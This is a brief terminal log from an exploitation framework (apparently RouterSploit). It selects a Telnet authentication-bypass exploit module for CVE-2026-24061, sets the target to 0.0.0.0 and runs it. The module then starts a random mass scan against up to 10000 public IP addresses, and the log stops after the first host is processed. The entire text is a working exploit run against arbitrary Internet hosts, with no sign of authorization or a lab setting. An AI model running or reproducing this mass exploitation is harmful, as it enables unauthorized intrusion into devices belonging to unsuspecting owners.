rsf> use exploits/telnet/telnet_auth_bypass_cve_2026_24061
Module 'exploits/telnet/telnet_auth_bypass_cve_2026_24061' selected.
rsf> t 0.0.0.0
Target set to: 0.0.0.0
rsf> run
[*] Using target: 0.0.0.0
Running module 'exploits/telnet/telnet_auth_bypass_cve_2026_24061' against target '0.0.0.0'
[*] Random mass scan — running 'Telnet Authentication Bypass CVE-2026-24061' against random public IPs (Ctrl+C to stop)
[*] Will scan up to 10000 random hosts with concurrency 2
[*] Progress: 1 processed | 0 ok | 0 err | 0 skipped












